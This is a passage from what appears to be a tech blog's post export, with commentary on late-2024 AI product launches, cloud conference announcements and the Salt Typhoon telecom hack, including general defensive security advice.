Just as we went from plain text editors to syntax-highlighted IDEs to intelligent code completion with IntelliSense, AI-powered suggestions are becoming the next expected layer.\nThe question is no longer \u0026ldquo;should I use an AI coding assistant?\u0026rdquo; but rather \u0026ldquo;which one integrates best with my workflow?\u0026rdquo; And by making Copilot free, GitHub is ensuring that for most developers, the answer defaults to their product.\nI think this also pressures the rest of the ecosystem in healthy ways. JetBrains will need to respond. The Cursor team, which has been doing genuinely innovative work with their editor, will need to differentiate even harder on capabilities rather than price. Open-source alternatives like Continue and Tabby will find their niche with developers who want local models and full control over their data.\nMy Take # I\u0026rsquo;ve been paying for Copilot since it went GA, and I\u0026rsquo;ll continue with the paid plan for the unlimited completions and JetBrains support. But I\u0026rsquo;m genuinely excited about the free tier — not for myself, but for the ecosystem effects.\nWhen I started programming in the early \u0026rsquo;90s, getting access to a decent compiler was itself a barrier. Over the decades, I\u0026rsquo;ve watched tooling become democratized — free IDEs, open-source frameworks, cloud-based development environments. Each wave lowered the barrier to entry and expanded who could participate in building software.\nFree AI-assisted coding is the next step in that progression. A developer in Lagos or Bangalore or São Paulo, working on a five-year-old laptop with a free VS Code installation, now has access to the same AI coding assistant as someone at a well-funded Silicon Valley startup. That matters.\nThe holiday timing means most teams won\u0026rsquo;t feel the impact until January, when developers return and start exploring. I expect we\u0026rsquo;ll see a significant spike in Copilot adoption numbers in Q1. 
And as more developers build muscle memory with AI-assisted workflows, the entire conversation about how we write software shifts again.\nNot a bad way to close out 2024.\n","date":"26 December 2024","externalUrl":null,"permalink":"/posts/241226-github-copilot-free-tier/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub’s decision to offer a free tier for Copilot signals a fundamental shift in how AI-assisted coding will reach developers everywhere.","title":"GitHub Copilot Goes Free — What This Means for Every Developer","type":"posts"},{"content":"If you\u0026rsquo;ve been following the news this month, you\u0026rsquo;ve seen the Salt Typhoon story escalate from a concerning report to what US officials are now calling one of the worst telecommunications hacks in American history. Chinese state-sponsored hackers have infiltrated at least eight major US telecom providers — including AT\u0026amp;T, Verizon, T-Mobile, and Lumen Technologies — and the full scope of the breach is still being uncovered. As someone who has spent decades building and securing systems, this one genuinely unsettles me.\nWhat Happened # Salt Typhoon (a name assigned by Microsoft\u0026rsquo;s threat intelligence team) is a Chinese state-affiliated cyber espionage group that has been systematically compromising telecommunications infrastructure. The campaign reportedly began as early as 2022 but wasn\u0026rsquo;t publicly disclosed until October 2024, when reports emerged that the group had accessed systems used for court-authorized wiretapping.\nThe implications are staggering. The attackers gained access to call metadata — who called whom, when, and for how long — for a vast number of Americans. In some cases, they accessed actual call content and text messages, particularly targeting individuals involved in government and political activities. 
The campaign is connected to broader government breaches and shows how severe attacks on critical infrastructure have become amid the ongoing zero-day treadmill.\nWhat makes this particularly alarming is the access to lawful intercept systems. These are the systems that telecom providers maintain to comply with court-ordered surveillance — essentially backdoors built into telecommunications infrastructure at the government\u0026rsquo;s request. The irony is brutal: systems designed to enable government surveillance were exploited by a foreign adversary to conduct their own surveillance. This validates concerns about government surveillance approaches and the risks of intentional backdoors.\nThe Technical Implications # For those of us building software systems, Salt Typhoon raises fundamental questions about infrastructure trust. If nation-state actors can compromise the telecommunications backbone, what does that mean for the security assumptions we build on?\nFirst, there\u0026rsquo;s the encryption question. End-to-end encrypted communications (Signal, WhatsApp\u0026rsquo;s Signal protocol, iMessage) appear to have been unaffected — the attackers could see metadata but not content for encrypted channels. This is a powerful validation of the end-to-end encryption model. CISA has taken the unusual step of explicitly recommending that Americans use encrypted messaging apps, which is a remarkable statement from a government agency that has historically been lukewarm about strong encryption.\nSecond, the compromise of lawful intercept infrastructure validates what security researchers have argued for years: you cannot build a \u0026ldquo;backdoor\u0026rdquo; that only good guys can use. The CALEA (Communications Assistance for Law Enforcement Act) infrastructure that was exploited exists because the US government mandated it. 
The lesson is clear — any intentional vulnerability in a system will eventually be found and exploited by adversaries.\nThird, the persistence of the attackers is notable. Reports indicate that despite months of remediation efforts, some telecoms have not been able to fully evict the attackers from their networks. This speaks to the depth of access achieved and the sophistication of the implants used. When we talk about \u0026ldquo;advanced persistent threats,\u0026rdquo; this is what the \u0026ldquo;persistent\u0026rdquo; part means.\nWhat This Means for Developers # You might think telecom infrastructure hacking is far removed from your day-to-day development work, but the lessons apply broadly.\nAssume the network is hostile. This has been a security principle for years, but Salt Typhoon makes it viscerally real. If you\u0026rsquo;re building applications that transmit sensitive data, end-to-end encryption isn\u0026rsquo;t optional — it\u0026rsquo;s essential. Don\u0026rsquo;t rely on transport-layer security alone. TLS protects data in transit, but if an attacker has access to network infrastructure, they may be able to intercept traffic at points where it\u0026rsquo;s decrypted.\nAudit your metadata exposure. Even when content is encrypted, metadata tells a story. Who communicates with whom, when, and how frequently can reveal as much as the content itself. If your application handles sensitive communications, consider what metadata you generate and how you can minimize it.\nZero-trust architecture isn\u0026rsquo;t just a buzzword. The telecom breaches succeeded in part because internal network trust was assumed. Once the attackers were inside, they could move laterally with relative ease. Building systems that verify every request, segment access, and monitor for anomalous behavior is the practical defense against this class of attack.\nSupply chain security matters. 
While the full details of how Salt Typhoon gained initial access are still emerging, reports suggest exploitation of vulnerabilities in network equipment from vendors like Cisco. The devices that form the backbone of your infrastructure are attack surfaces. Supply chain security standards like SLSA, npm ecosystem discipline, and diligent vendor management are all critical.\nThe Policy Dimension # The Salt Typhoon revelations are already shaping policy discussions. The FCC is considering new rules requiring telecoms to secure their networks against state-sponsored attacks, with potential annual certification requirements. There\u0026rsquo;s bipartisan momentum for legislation addressing telecom security, which is notable in the current political climate.\nThe broader geopolitical context matters too. This comes amid ongoing tensions between the US and China over technology — chip export controls, TikTok scrutiny, and now telecommunications espionage. For technology professionals working in multinational environments, understanding these dynamics isn\u0026rsquo;t just academic; it affects vendor selection, data residency decisions, and compliance requirements.\nMy Take # Salt Typhoon is a wake-up call, though I fear it won\u0026rsquo;t be the last one needed. The telecommunications industry has underinvested in security for decades, treating it as a cost center rather than a core requirement. The fact that lawful intercept systems were compromised is particularly damning — it demonstrates that mandated backdoors are a liability, not just for privacy advocates but for national security, reinforcing the need for stronger defensive practices across all critical infrastructure.\nFor developers and architects, the practical takeaway is to double down on end-to-end encryption, minimize metadata exposure, and design systems that assume the network cannot be trusted. 
These aren\u0026rsquo;t new principles, but Salt Typhoon gives them renewed urgency.\nAnd if you\u0026rsquo;re still sending sensitive information over unencrypted channels — SMS, regular phone calls, unencrypted email — now is the time to change that habit. The threat isn\u0026rsquo;t theoretical anymore.\n","date":"19 December 2024","externalUrl":null,"permalink":"/posts/241219-salt-typhoon-telecom-hack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Salt Typhoon campaign has compromised major US telecoms at a staggering scale. What developers and architects need to understand about this ongoing threat.","title":"Salt Typhoon — The Telecom Hack That Should Worry Every Engineer","type":"posts"},{"content":"Google dropped Gemini 2.0 yesterday, and the \u0026ldquo;Flash\u0026rdquo; variant is already available for developers through the Gemini API and Google AI Studio. After watching OpenAI dominate headlines with their 12 Days of announcements, Google has fired back with what appears to be a genuinely impressive next generation of their foundation model. Having followed the AI model releases closely this year, Gemini 2.0 feels like it narrows the gap considerably — and in some areas, may leapfrog the competition.\nWhat\u0026rsquo;s New in Gemini 2.0 # The headline feature is what Google calls \u0026ldquo;agentic capabilities\u0026rdquo; — the model can natively use tools like Google Search, execute code, and call third-party functions as part of its reasoning process. This isn\u0026rsquo;t entirely new in concept (function calling has been available in various models), but the integration depth is notable. Gemini 2.0 Flash can, in a single turn, search the web for current information, write and execute Python code to analyze the results, and generate a response that synthesizes everything.\nMultimodal output is another significant addition. 
Previous Gemini versions could understand images and audio as input, but Gemini 2.0 can also generate images and produce text-to-speech audio natively. This opens up use cases that previously required chaining multiple models together — a workflow that\u0026rsquo;s always been brittle and latency-heavy.\nPerformance-wise, Google claims Gemini 2.0 Flash outperforms the previous generation\u0026rsquo;s Pro model on key benchmarks while maintaining Flash\u0026rsquo;s characteristic speed and cost efficiency. If that holds up in practice, it\u0026rsquo;s remarkable — getting Pro-level quality at Flash-level pricing and latency would make it extremely competitive for production API use cases.\nThe \u0026ldquo;Flash\u0026rdquo; Philosophy # I appreciate Google\u0026rsquo;s approach with the Flash tier. While the industry tends to focus on the biggest, most capable models, the reality for most production applications is that you need something fast, reliable, and affordable. Running GPT-4o or Claude Sonnet on every API call gets expensive at scale. Flash models — whether Google\u0026rsquo;s Gemini Flash or similar offerings — address the sweet spot where you need more capability than a basic model but can\u0026rsquo;t justify the latency and cost of the top tier.\nIn my experience building AI-powered features for production systems, the model you actually ship with is almost never the most capable one available. It\u0026rsquo;s the one that gives you acceptable quality within your latency and cost budgets. Comparing against foundation models like Claude with advanced capabilities, Gemini 2.0 Flash exemplifies Google\u0026rsquo;s competitive strategy. Pushing Pro-level quality into the Flash tier is exactly the kind of improvement that changes production deployment decisions.\nAgentic AI: The Common Thread # It\u0026rsquo;s impossible to miss that every major AI company is converging on the same narrative: agents. Microsoft announced Copilot agents at Ignite. 
OpenAI is building tool use deeper into their models. And now Google is positioning Gemini 2.0 as fundamentally designed for agentic workflows.\nGoogle showcased several prototype agents built on Gemini 2.0: Project Astra (a universal AI assistant that can see and understand the world through your phone\u0026rsquo;s camera), Project Mariner (a Chrome extension that can browse the web and take actions on your behalf), and Jules (a coding agent that integrates with GitHub to handle pull requests and bug fixes).\nJules is particularly interesting for developers. The idea of an AI that can autonomously work through your GitHub issues, create branches, write code, and submit PRs is compelling — and slightly terrifying. I\u0026rsquo;ve seen enough auto-generated code to know that rigorous testing and review remains critical. But as a tool for handling mechanical tasks like dependency updates, boilerplate generation, or straightforward bug fixes, it could save real time.\nThe Developer Experience Gap # Where Google still needs to improve is the developer experience around its AI platform. The Gemini API has evolved significantly, but it still feels less polished than OpenAI\u0026rsquo;s offering. Documentation can be inconsistent, pricing isn\u0026rsquo;t always transparent, and the proliferation of Google AI products (Vertex AI, Google AI Studio, Firebase ML) creates confusion about which platform to use for what.\nThat said, Google AI Studio has gotten markedly better for prototyping. If you haven\u0026rsquo;t tried it recently, it\u0026rsquo;s worth another look. The ability to test prompts against Gemini 2.0 with real-time streaming, upload files for multimodal analysis, and export code snippets is genuinely useful for rapid experimentation.\nThe Vertex AI integration matters for enterprise teams who need the full MLOps stack — model management, monitoring, A/B testing, and compliance controls. 
Google\u0026rsquo;s challenge is making the path from \u0026ldquo;I tried this in AI Studio\u0026rdquo; to \u0026ldquo;this is running in Vertex AI in production\u0026rdquo; as smooth as possible.\nMy Take # Gemini 2.0 Flash is the most significant Google AI release since the original Gemini launch. The combination of improved quality, native tool use, and multimodal output at Flash-tier pricing makes it a serious contender for production AI workloads. For developers who\u0026rsquo;ve been defaulting to OpenAI\u0026rsquo;s API, this is worth evaluating — especially if your use cases benefit from Google Search integration or multimodal capabilities. The landscape of AI providers continues to diversify, giving teams real choice.\nThe broader picture is even more interesting. We now have three major AI platforms (OpenAI, Google, Anthropic) all pushing hard on agentic capabilities, each with different strengths. OpenAI leads in reasoning with o1, Google leads in multimodal and search integration, and Anthropic leads in safety and reliability. This competition is driving rapid improvement, and developers who stay flexible — avoiding tight coupling to any single provider — will be best positioned to take advantage of it.\nThe next few months are going to be fascinating. I suspect we\u0026rsquo;ll look back at December 2024 as the month the AI industry shifted from \u0026ldquo;better chatbots\u0026rdquo; to \u0026ldquo;autonomous agents\u0026rdquo; as the primary paradigm. Whether that\u0026rsquo;s premature remains to be seen, but the direction is clear.\n","date":"12 December 2024","externalUrl":null,"permalink":"/posts/241212-google-gemini-2-flash/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google’s Gemini 2.0 Flash brings native tool use, multimodal output, and agentic capabilities. 
A look at what this means for the competitive AI landscape.","title":"Google Launches Gemini 2.0 Flash — The Multi-Modal AI Race Accelerates","type":"posts"},{"content":"OpenAI launched its \u0026ldquo;12 Days of OpenAI\u0026rdquo; livestream event today, and day one came out swinging. The full o1 model is now generally available to ChatGPT Plus and Team subscribers, and there\u0026rsquo;s a brand new ChatGPT Pro subscription tier at $200 per month. After months of the o1-preview, we finally get the real thing — and it\u0026rsquo;s a notable step forward in how AI models handle complex reasoning tasks.\nWhat Makes o1 Different # The o1 model family represents a fundamental architectural shift from the GPT-4 lineage. Rather than generating tokens in a straightforward autoregressive manner, o1 uses a \u0026ldquo;chain of thought\u0026rdquo; reasoning process that mirrors advances in other reasoning models — it effectively thinks before it responds, spending additional compute time working through problems step by step before producing its final answer. This contrasts with context-length optimization approaches and broader LLM development paradigms that focus on different dimensions of model capability.\nIn practice, this means o1 excels at tasks that require multi-step logical reasoning: mathematics, coding problems that involve complex logic, scientific analysis, and strategic planning. OpenAI reports significant improvements over GPT-4o on benchmarks like AIME (American Invitational Mathematics Examination), GPQA (graduate-level science questions), and competitive programming challenges.\nI\u0026rsquo;ve been testing o1-preview for several weeks in my own workflow, particularly for code review and architectural analysis. 
The difference is most apparent when you give it a complex codebase question — something like \u0026ldquo;analyze this authentication flow and identify potential race conditions.\u0026rdquo; Where GPT-4o would sometimes give superficial answers, o1-preview consistently produced more thorough, structured analysis. This mirrors advancements in AI-assisted code analysis and agentic workflows. The full o1 model reportedly improves on this further, with better factual accuracy and more coherent long-form reasoning.\nChatGPT Pro at $200/Month # The new Pro tier gives subscribers access to \u0026ldquo;o1 pro mode,\u0026rdquo; which uses even more compute per query for the most challenging tasks. OpenAI describes it as delivering more reliable and thorough answers on hard problems in math, science, and programming. You also get unlimited access to o1, GPT-4o, and Advanced Voice Mode.\nTwo hundred dollars a month is steep for an individual, but for a professional developer or researcher, the math can work out. If o1 pro mode saves you even a few hours per month of debugging or analysis time, it pays for itself. That said, the value proposition depends entirely on whether the \u0026ldquo;pro mode\u0026rdquo; delivers meaningfully better results than standard o1 for your specific use cases. I\u0026rsquo;d want to see concrete comparisons before committing.\nThe pricing signal is interesting from a broader perspective. It suggests that OpenAI\u0026rsquo;s most capable models are genuinely expensive to run — the compute cost of extended reasoning chains adds up. This connects to broader AI infrastructure costs and compute moat dynamics. This has implications for API pricing too. 
Developers building applications on top of o1 via the API need to think carefully about cost management, because a model that \u0026ldquo;thinks longer\u0026rdquo; on complex queries will cost more per request than a straightforward GPT-4o call.\nImplications for Developer Workflows # For those of us who build software, o1 opens up some new possibilities. Code generation is the obvious one, but I think the more impactful use cases are in code understanding and analysis. Large codebases are notoriously difficult to reason about — understanding the implications of a change across multiple services, identifying subtle bugs that arise from interaction patterns, or evaluating whether a proposed architecture will scale. These are tasks that benefit from the kind of systematic reasoning that o1 is designed for.\nI can also see o1 becoming valuable in incident response. When you\u0026rsquo;re debugging a production issue at 2 AM and trying to correlate logs across multiple services, having a model that can methodically work through hypotheses rather than pattern-matching to the most likely answer could be genuinely useful.\nThe developer experience around these models still needs work, though. Latency is the main concern — o1\u0026rsquo;s reasoning process means responses take longer, sometimes significantly longer. For interactive coding assistance where you want quick completions, GPT-4o is still the better choice. O1 is more suited to \u0026ldquo;background analysis\u0026rdquo; tasks where you can afford to wait 30 seconds or more for a thorough answer.\nThe \u0026ldquo;12 Days\u0026rdquo; Strategy # OpenAI\u0026rsquo;s decision to stretch their announcements across twelve days of livestreams is a savvy marketing move. It keeps them in the news cycle continuously and builds anticipation. 
But it also reflects the reality that they have a lot to announce — rumored upcoming reveals include updates to Sora (their video generation model), new API capabilities, and potentially more model releases.\nThe competitive landscape is heating up. Google is expected to announce Gemini 2.0 soon, Anthropic has been steadily improving Claude, and open-source models from Meta and Mistral keep closing the gap. OpenAI maintaining its perceived lead requires a constant drumbeat of improvements, and this event is clearly designed to reinforce their position.\nMy Take # The full o1 release is the most significant development in AI tooling since GPT-4\u0026rsquo;s launch. Not because it\u0026rsquo;s the most capable model on every task — it isn\u0026rsquo;t, and GPT-4o remains better for many common use cases — but because it demonstrates a viable path for improving AI capabilities beyond simply scaling training data and parameters. The idea that you can improve output quality by giving a model more inference-time compute to \u0026ldquo;think\u0026rdquo; is powerful, and I expect this approach to become standard across the industry.\nFor developers, my practical advice is: try o1 for your hardest reasoning tasks. Don\u0026rsquo;t use it for everything — it\u0026rsquo;s slower and more expensive — but identify the places in your workflow where you need deeper analysis, and test whether o1 delivers. The results might surprise you.\nThe next eleven days of announcements should be interesting. I\u0026rsquo;ll be following along and will cover anything that\u0026rsquo;s relevant for our work as developers.\n","date":"5 December 2024","externalUrl":null,"permalink":"/posts/241205-openai-o1-full-model-chatgpt-pro/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI kicks off its ‘12 Days of OpenAI’ event with the full o1 reasoning model and a new $200/month ChatGPT Pro tier. 
What this means for developers building with AI.","title":"OpenAI Launches o1 Full Model and $200/Month ChatGPT Pro — The Reasoning Era Begins","type":"posts"},{"content":"It\u0026rsquo;s re:Invent week in Las Vegas, and AWS is doing what it does best — overwhelming the industry with a firehose of announcements. I\u0026rsquo;m following along remotely this year, and even from a distance, the energy is palpable. After thirty years in this industry, I\u0026rsquo;ve learned that re:Invent keynotes are roughly 40% substance and 60% marketing theater, but the substance this year is genuinely compelling.\nTrainium2 and the Custom Silicon Arms Race # The biggest infrastructure story is the general availability of Trainium2-powered instances. AWS has been building custom chips for years — Graviton for general compute, Inferentia for inference — but Trainium2 represents their most ambitious play yet in the AI training space. Amazon claims a 4x improvement in training performance over the first-generation Trainium, with the ability to scale to 100,000-chip UltraClusters.\nThis is directly aimed at NVIDIA\u0026rsquo;s dominance. While AWS still offers GPU instances (and plenty of them), the economics of running training workloads on custom silicon at cloud-provider scale could be transformative. If you\u0026rsquo;re an organization spending seven or eight figures on model training, even a 20-30% cost reduction is enormous. The question is whether the software ecosystem — frameworks, compilers, debugging tools — can match what NVIDIA offers with CUDA. That\u0026rsquo;s historically been the stumbling block for alternative AI accelerators. 
This challenge mirrors broader AI infrastructure standardization efforts and cloud cost optimization concerns.\nMatt Garman\u0026rsquo;s keynote emphasized that Amazon is using Trainium2 extensively internally to train its own models, which is both a vote of confidence and a practical necessity — they need to prove the platform works at scale before enterprise customers will trust it with their critical workloads.\nAurora DSQL: Serverless Distributed SQL # On the database front, Aurora DSQL caught my eye. It\u0026rsquo;s a new serverless, distributed SQL database that promises PostgreSQL compatibility with virtually unlimited scalability, 99.99% single-Region availability, and 99.999% multi-Region availability. AWS describes it as offering \u0026ldquo;the speed of active-active with the consistency of active-passive.\u0026rdquo;\nIf you\u0026rsquo;ve spent any time wrestling with distributed databases — and I\u0026rsquo;ve spent more than I care to remember — you know that\u0026rsquo;s a bold claim. The CAP theorem doesn\u0026rsquo;t disappear just because you\u0026rsquo;re AWS. These fundamental tradeoffs persist in infrastructure architecture decisions. But the architecture appears interesting: they\u0026rsquo;ve separated compute, storage, and transaction management into independent layers, each scaling independently.\nThe PostgreSQL compatibility is key. For teams already running on Aurora PostgreSQL, the migration path should be manageable. For greenfield projects that need global distribution without the operational complexity of CockroachDB or Spanner, this could be compelling. I\u0026rsquo;ll be watching for real-world benchmarks and latency numbers as early adopters start testing it.\nAmazon Nova: Foundation Models In-House # Amazon also launched Amazon Nova, a family of foundation models available through Bedrock. The lineup includes Nova Micro (text-only, optimized for speed and cost), Nova Lite (multimodal), and Nova Pro (the most capable, balancing accuracy and speed). 
Amazon is positioning these as cost-effective alternatives to models from Anthropic, Meta, and others available on Bedrock.\nThe strategic logic is clear: AWS doesn\u0026rsquo;t want to be purely a model-hosting platform. By offering competitive first-party models, they can capture more of the AI value chain and reduce dependency on third-party model providers. It\u0026rsquo;s the same playbook they\u0026rsquo;ve run with databases, networking, and virtually every other infrastructure category — start by hosting others\u0026rsquo; solutions, then build your own.\nFrom a developer perspective, the interesting aspect is the unified Bedrock API. Whether you\u0026rsquo;re using Nova, Claude, or Llama, the interface is consistent. This approach mirrors multi-runtime compatibility we\u0026rsquo;re seeing elsewhere. This makes it practical to benchmark different models against each other for specific use cases and switch with minimal code changes. That\u0026rsquo;s the kind of flexibility that matters in a rapidly evolving landscape.\nDevOps and Developer Tooling Updates # Beyond the headline grabbers, several smaller announcements matter for day-to-day development work. AWS CloudFormation now supports importing existing resources more seamlessly, addressing one of the longest-standing pain points in infrastructure-as-code adoption. If you\u0026rsquo;ve ever had to write a CloudFormation template around resources that were created manually in the console — and who hasn\u0026rsquo;t — this is welcome.\nAmazon Q Developer, their AI coding assistant, received significant updates including the ability to perform autonomous code transformations. Point it at a Java 8 application and it can migrate it to Java 17, handling dependency updates and test validation. 
I\u0026rsquo;m skeptical of fully autonomous code migrations, but as an assistant that handles the mechanical parts while a developer reviews, it could save significant time.\nMy Take # Re:Invent 2024 feels like AWS acknowledging that the cloud landscape has shifted. Five years ago, the focus was on breadth of services. Now, it\u0026rsquo;s about depth in AI infrastructure and reducing the total cost of AI workloads. The custom silicon strategy is a long-term bet that could fundamentally change the economics of AI if the software ecosystem matures.\nFor DevOps teams, the practical advice is to evaluate Aurora DSQL if you have global distribution requirements, and keep an eye on Trainium2 instance pricing for training workloads. These infrastructure investments align with platform engineering and observability maturity. The cost savings could be substantial, but validate that your frameworks are fully supported before committing.\nComing right after Microsoft Ignite, the contrast is interesting: Microsoft leads with Copilot and agents, AWS leads with infrastructure and cost optimization. Both are valid strategies, and the competition is driving rapid innovation. As engineers, we\u0026rsquo;re in a good position — the tools keep getting better, and the choices keep multiplying.\n","date":"28 November 2024","externalUrl":null,"permalink":"/posts/241128-aws-reinvent-2024-highlights/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Invent 2024 opens with major announcements around Trainium2 chips, Aurora DSQL, and Amazon’s own Nova AI models. Here’s what’s worth paying attention to.","title":"AWS re:Invent 2024 — Amazon Bets Big on Custom Silicon and AI Infrastructure","type":"posts"},{"content":"Microsoft Ignite kicked off this week in Chicago, and if the sheer volume of announcements is any indicator, Redmond is going all-in on making Azure the default platform for AI workloads. 
Having attended Ignite in various forms over the years — from the old TechEd days to the pandemic-era virtual events — I can say this year\u0026rsquo;s edition felt like a genuine inflection point. The messaging was clear: everything is AI-first now.\nAzure AI Foundry: A Unified Platform Play # The headline announcement that caught my attention was Azure AI Foundry, essentially a rebranding and consolidation of Azure AI Studio into a more comprehensive platform. Microsoft is positioning it as the single place where developers can build, test, and deploy AI applications — bringing together model catalog access, prompt engineering tools, evaluation frameworks, and deployment pipelines.\nWhat\u0026rsquo;s interesting here isn\u0026rsquo;t just the product itself, but the strategic intent. By unifying these capabilities, Microsoft is trying to reduce the friction that enterprise teams face when moving from experimentation to production. I\u0026rsquo;ve seen this pattern play out in my own consulting work — teams build impressive prototypes in notebooks but struggle to operationalize them. If Foundry delivers on its promise, it could meaningfully shorten that gap.\nThe model catalog now includes models from Meta, Mistral, and Cohere alongside OpenAI\u0026rsquo;s offerings. This multi-model approach is smart, mirroring Microsoft\u0026rsquo;s broader AI platform strategy announced earlier in the year. Lock-in anxiety is real, and giving teams the ability to swap models without rewriting their orchestration layer is a strong value proposition.\nCopilot Actions and the Agent Era # Microsoft also unveiled Copilot Actions — essentially the ability to create automated workflows triggered by natural language prompts within the Microsoft 365 ecosystem. Think of it as Power Automate, but with Copilot as the interface layer. 
You can set up recurring tasks like \u0026ldquo;summarize my unread emails every morning\u0026rdquo; or \u0026ldquo;draft a weekly status report from my Teams conversations.\u0026rdquo;\nI\u0026rsquo;m cautiously optimistic about this. The concept of AI agents that can take actions on your behalf is compelling, but the devil is in the details. Permission models, data governance, and audit trails become critical when an AI is performing actions in your corporate environment. These governance concerns mirror broader AI regulatory requirements becoming increasingly important across the industry. Microsoft seems to be aware of this — they emphasized built-in governance controls — but I\u0026rsquo;ll reserve judgment until I see how it works in practice.\nThe broader \u0026ldquo;agent\u0026rdquo; narrative was everywhere at Ignite. Azure AI Agent Service, Copilot Studio with autonomous agent capabilities, even SharePoint agents. It feels like Microsoft is betting that the next phase of AI adoption isn\u0026rsquo;t just chat interfaces but semi-autonomous processes. That aligns with what I\u0026rsquo;m hearing from enterprise architects: chatbots are nice, but what they really want is AI that can handle repetitive workflows end-to-end.\nInfrastructure Upgrades Under the Hood # Beneath the AI glitz, there were meaningful infrastructure announcements. Azure Cobalt 100 VMs are now generally available — these are Arm-based VMs that Microsoft claims offer up to 50% better price-performance for general-purpose workloads compared to their x86 counterparts. The Arm push in the cloud continues, and for teams running containerized microservices, the migration path is increasingly straightforward.\nAzure Local (the evolution of Azure Stack HCI) also got significant updates, emphasizing hybrid scenarios where organizations need to run Azure services on-premises. 
With the new Azure Managed Redis offering and improvements to Azure Kubernetes Service on Azure Local, Microsoft is making the hybrid story more coherent. For organizations in regulated industries that can\u0026rsquo;t move everything to the public cloud, this matters.\nOn the security front, Windows Resiliency Initiative was announced in the wake of the CrowdStrike incident earlier this year. Microsoft is introducing Quick Machine Recovery, allowing IT administrators to remotely fix machines that can\u0026rsquo;t boot — addressing exactly the scenario that grounded airlines and disrupted hospitals in July. Better late than never, I suppose, though one could argue these capabilities should have existed years ago.\nMy Take # What strikes me about Ignite 2024 is the coherence of the message. Previous years sometimes felt like a grab bag of announcements across different product groups. This year, there\u0026rsquo;s a clear thread: Azure is the AI platform, Copilot is the interface, and agents are the future of productivity.\nThe risk, of course, is that Microsoft is moving so fast that quality suffers. I\u0026rsquo;ve already heard grumbles from developers about Copilot\u0026rsquo;s reliability in certain IDEs, and the agent capabilities are still early. But the investment is undeniable — Satya Nadella mentioned during the keynote that Microsoft\u0026rsquo;s capital expenditure this fiscal year will exceed $50 billion, primarily for AI infrastructure.\nFor those of us building on Azure, the practical takeaway is to start exploring Azure AI Foundry and understand the agent programming model. Whether or not you\u0026rsquo;re ready to deploy AI agents in production, the platform is clearly being optimized for that pattern, and staying ahead of the curve is worth the investment in learning.\nThe cloud AI race is intensifying between Microsoft, Amazon, and Google, with each platform differentiating on security, AI capabilities, and infrastructure investment. 
We\u0026rsquo;re all benefiting from this competition.\n","date":"21 November 2024","externalUrl":null,"permalink":"/posts/241121-microsoft-ignite-2024-azure-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Ignite 2024 delivered a wave of Azure AI announcements — from Copilot Actions to Azure AI Foundry. Here’s what matters for developers and architects.","title":"Microsoft Ignite 2024 — Azure AI and Copilot Take Center Stage","type":"posts"},{"content":"This week, the scope of the Salt Typhoon cyberattack has become disturbingly clear. Multiple major US telecom providers — including AT\u0026amp;T, Verizon, T-Mobile, and Lumen Technologies — have confirmed breaches attributed to a Chinese state-sponsored hacking group. The attackers reportedly had access to call metadata, and in some cases actual communications, for months before detection. Federal investigations are ongoing, and the full extent of the compromise is still being assessed.\nThis isn\u0026rsquo;t your average data breach. This is a systematic penetration of the communications infrastructure that underpins American society. And it raises questions that every engineer building or maintaining critical systems needs to grapple with.\nWhat We Know So Far # Salt Typhoon (also tracked as GhostEmperor and FamousSparrow by different security firms) is a Chinese advanced persistent threat (APT) group that has been operating since at least 2020. The campaign connects to broader government infrastructure breaches and represents part of a larger pattern of sophisticated nation-state cyber operations. 
According to reporting from the Wall Street Journal and statements from CISA and the FBI, the group exploited vulnerabilities in telecom network infrastructure to gain persistent access.\nThe attack targeted systems used to comply with lawful intercept requirements — the CALEA (Communications Assistance for Law Enforcement Act) infrastructure that telecom providers are legally required to maintain. The cruel irony here is that backdoors built into telecom systems for lawful surveillance purposes became the attack vector for foreign espionage.\nThe metadata accessed reportedly includes call records: who called whom, when, for how long, and from where. For targeted individuals — reportedly including people involved in political campaigns — the access may have extended to actual call content and text messages.\nThe CALEA Paradox # For those of us who have followed the encryption and surveillance debates over the decades, Salt Typhoon is the nightmare scenario that security researchers have been warning about for years. This echoes concerns raised about critical infrastructure vulnerabilities where perimeter systems become the weak link.\nThe argument for lawful intercept capabilities has always been: we need these access points for legitimate law enforcement purposes, and we can secure them adequately. The counterargument has always been: any intentional weakness in a system can be exploited by unintended actors. You cannot build a backdoor that only the good guys can use.\nSalt Typhoon just proved the counterargument correct at a scale that\u0026rsquo;s hard to ignore. The very infrastructure built to enable authorized surveillance became the entry point for unauthorized surveillance by a foreign government.\nThis isn\u0026rsquo;t theoretical anymore. The next time someone proposes mandating encryption backdoors or expanding lawful intercept requirements, Salt Typhoon should be exhibit A for why that approach is fundamentally flawed. 
Security is not divisible — you cannot weaken a system for one purpose without weakening it for all purposes.\nWhat This Means for Engineering Teams # Even if you\u0026rsquo;re not building telecom infrastructure, there are concrete lessons here:\nAudit your compliance-mandated access points. If regulations require you to maintain monitoring, logging, or access capabilities, those are attack surfaces. Treat them with the same rigor you\u0026rsquo;d apply to any external-facing service. Segment them. Monitor them. Test them.\nPersistent access is the real threat. Salt Typhoon reportedly maintained access for months. The initial breach matters less than the dwell time. Invest in detection capabilities that can identify anomalous access patterns over long time horizons, not just perimeter defenses.\nSupply chain and infrastructure trust. Telecom infrastructure involves a complex web of vendors, protocols, and legacy systems. Many of the components in telecom networks were designed decades ago with different threat models. Implementing supply chain security standards like SLSA across infrastructure dependencies can help mitigate these risks. If you\u0026rsquo;re integrating with or depending on infrastructure you don\u0026rsquo;t fully control, you need to account for the possibility that it\u0026rsquo;s compromised.\nMetadata is not \u0026ldquo;just metadata.\u0026rdquo; There\u0026rsquo;s a persistent myth that metadata — who communicated with whom, when, and where — is somehow less sensitive than content. Intelligence agencies know better. Metadata at scale reveals patterns, relationships, movements, and intentions. If your systems generate or store metadata, protect it accordingly.\nThe Geopolitical Dimension # Salt Typhoon exists in the context of an escalating cyber conflict between nation-states. 
